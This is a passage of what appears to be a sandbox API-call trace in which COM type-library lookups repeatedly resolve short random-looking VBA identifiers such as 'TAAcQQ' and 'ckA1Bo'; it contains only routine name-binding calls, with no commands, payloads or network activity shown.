ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81432, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="TAAcQQ") returned 7 [0069.639] ITypeComp:RemoteBind (in: This=0x665ba60, szName="TAAcQQ", lHashVal=0x101287, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81432, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="TAAcQQ") returned 7 [0069.639] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="TAAcQQ", lHashVal=0x101287, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81432, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="TAAcQQ") returned 7 [0069.639] ITypeComp:RemoteBind (in: This=0x665bd30, szName="TAAcQQ", lHashVal=0x101287, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.639] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TAAcQQ") returned 0x101287 [0069.639] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="TAAcQQ" | out: _Dst="TAAcQQ") returned 0x0 [0069.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="TAAcQQ") returned 7 [0069.639] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.639] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="TAAcQQ", lHashVal=0x101287, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.639] IUnknown:Release (This=0x665ba50) returned 0xd [0069.639] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.639] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="TAAcQQ", lHashVal=0x101287, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.639] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.639] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.639] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="TAAcQQ", lHashVal=0x101287, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.639] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.639] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.639] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="TAAcQQ", lHashVal=0x101287, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.639] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81432, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="TAAcQQ") returned 7 [0069.640] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="TAAcQQ", lHashVal=0x101287, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.640] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.640] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81432 | out: _Dst=0x67c2d40) returned 0x0 [0069.640] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_TAAcQQ") returned 0x108d30 [0069.640] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_TAAcQQ" | out: _Dst="_B_var_TAAcQQ") returned 0x0 [0069.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_TAAcQQ") returned 14 [0069.640] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.640] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_TAAcQQ", lHashVal=0x108d30, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.640] IUnknown:Release (This=0x665ba50) returned 0xd [0069.640] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.640] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_TAAcQQ", lHashVal=0x108d30, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.640] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.640] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.640] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_TAAcQQ", lHashVal=0x108d30, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.640] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.640] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.640] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_TAAcQQ", lHashVal=0x108d30, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.640] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.640] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.640] IUnknown:Release (This=0x665ba50) returned 0xd [0069.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87070e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_TAAcQQ") returned 14 [0069.640] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_TAAcQQ", lHashVal=0x108d30, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x51006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x51006300000000, pDummy=0x0) returned 0x0 [0069.640] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81432 | out: _Dst=0x144ec0) returned 0x0 [0069.641] ITypeComp:RemoteBind (in: This=0x665ba60, szName="T4QAAk", lHashVal=0x10f7aa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81522, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="T4QAAk") returned 7 [0069.641] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="T4QAAk", lHashVal=0x10f7aa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81522, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="T4QAAk") returned 7 [0069.641] ITypeComp:RemoteBind (in: This=0x665bd30, szName="T4QAAk", lHashVal=0x10f7aa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.641] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="T4QAAk") returned 0x10f7aa [0069.641] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="T4QAAk" | out: _Dst="T4QAAk") returned 0x0 [0069.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="T4QAAk") returned 7 [0069.641] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.641] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="T4QAAk", lHashVal=0x10f7aa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.641] IUnknown:Release (This=0x665ba50) returned 0xd [0069.641] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.641] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="T4QAAk", lHashVal=0x10f7aa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.641] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.641] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.642] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="T4QAAk", lHashVal=0x10f7aa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.642] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.642] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.642] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="T4QAAk", lHashVal=0x10f7aa, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.642] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81522, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="T4QAAk") returned 7 [0069.642] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="T4QAAk", lHashVal=0x10f7aa, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.642] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.642] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81522 | out: _Dst=0x67c2d40) returned 0x0 [0069.642] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_T4QAAk") returned 0x107214 [0069.642] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_T4QAAk" | out: _Dst="_B_var_T4QAAk") returned 0x0 [0069.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_T4QAAk") returned 14 [0069.642] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.642] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_T4QAAk", lHashVal=0x107214, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.642] IUnknown:Release (This=0x665ba50) returned 0xd [0069.642] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.642] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_T4QAAk", lHashVal=0x107214, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.642] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.642] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.642] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_T4QAAk", lHashVal=0x107214, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.642] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.643] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.643] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_T4QAAk", lHashVal=0x107214, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.643] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.643] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.643] IUnknown:Release (This=0x665ba50) returned 0xd [0069.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87073e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_T4QAAk") returned 14 [0069.643] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_T4QAAk", lHashVal=0x107214, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.643] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81522 | out: _Dst=0x144ec0) returned 0x0 [0069.643] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MA_wAAX", lHashVal=0x10d179, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b814fa, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="MA_wAAX") returned 8 [0069.643] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MA_wAAX", lHashVal=0x10d179, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b814fa, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="MA_wAAX") returned 8 [0069.643] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MA_wAAX", lHashVal=0x10d179, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.643] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MA_wAAX") returned 0x10d179 [0069.643] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="MA_wAAX" | out: _Dst="MA_wAAX") returned 0x0 [0069.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="MA_wAAX") returned 8 [0069.643] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.643] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MA_wAAX", lHashVal=0x10d179, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.643] IUnknown:Release (This=0x665ba50) returned 0xd [0069.644] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.644] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MA_wAAX", lHashVal=0x10d179, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.644] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.644] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.644] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MA_wAAX", lHashVal=0x10d179, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.644] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.644] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.644] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MA_wAAX", lHashVal=0x10d179, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.644] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b814fa, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="MA_wAAX") returned 8 [0069.644] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MA_wAAX", lHashVal=0x10d179, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.644] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.644] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b814fa | out: _Dst=0x67c2d40) returned 0x0 [0069.644] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MA_wAAX") returned 0x10c57c [0069.644] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_MA_wAAX" | out: _Dst="_B_var_MA_wAAX") returned 0x0 [0069.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_MA_wAAX") returned 15 [0069.644] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.644] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MA_wAAX", lHashVal=0x10c57c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.644] IUnknown:Release (This=0x665ba50) returned 0xd [0069.644] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.644] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MA_wAAX", lHashVal=0x10c57c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.644] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.644] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.644] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MA_wAAX", lHashVal=0x10c57c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.644] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.644] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.644] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MA_wAAX", lHashVal=0x10c57c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.645] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.645] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.645] IUnknown:Release (This=0x665ba50) returned 0xd [0069.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87076e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_MA_wAAX") returned 15 [0069.645] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MA_wAAX", lHashVal=0x10c57c, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x41007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x41007700000000, pDummy=0x0) returned 0x0 [0069.645] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b814fa | out: _Dst=0x144ec0) returned 0x0 [0069.645] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ckA1Bo", lHashVal=0x10e1c7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8154a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ckA1Bo") returned 7 [0069.645] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ckA1Bo", lHashVal=0x10e1c7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8154a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ckA1Bo") returned 7 [0069.645] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ckA1Bo", lHashVal=0x10e1c7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.645] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ckA1Bo") returned 0x10e1c7 [0069.645] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="ckA1Bo" | out: _Dst="ckA1Bo") returned 0x0 [0069.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="ckA1Bo") returned 7 [0069.645] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.645] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ckA1Bo", lHashVal=0x10e1c7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.645] IUnknown:Release (This=0x665ba50) returned 0xd [0069.645] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.645] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ckA1Bo", lHashVal=0x10e1c7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.646] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.646] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.646] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ckA1Bo", lHashVal=0x10e1c7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.646] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.646] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.646] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ckA1Bo", lHashVal=0x10e1c7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.646] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8154a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ckA1Bo") returned 7 [0069.646] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ckA1Bo", lHashVal=0x10e1c7, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.646] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.646] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8154a | out: _Dst=0x67c2d40) returned 0x0 [0069.646] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ckA1Bo") returned 0x105c31 [0069.646] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_ckA1Bo" | out: _Dst="_B_var_ckA1Bo") returned 0x0 [0069.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_ckA1Bo") returned 14 [0069.646] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.646] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ckA1Bo", lHashVal=0x105c31, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.646] IUnknown:Release 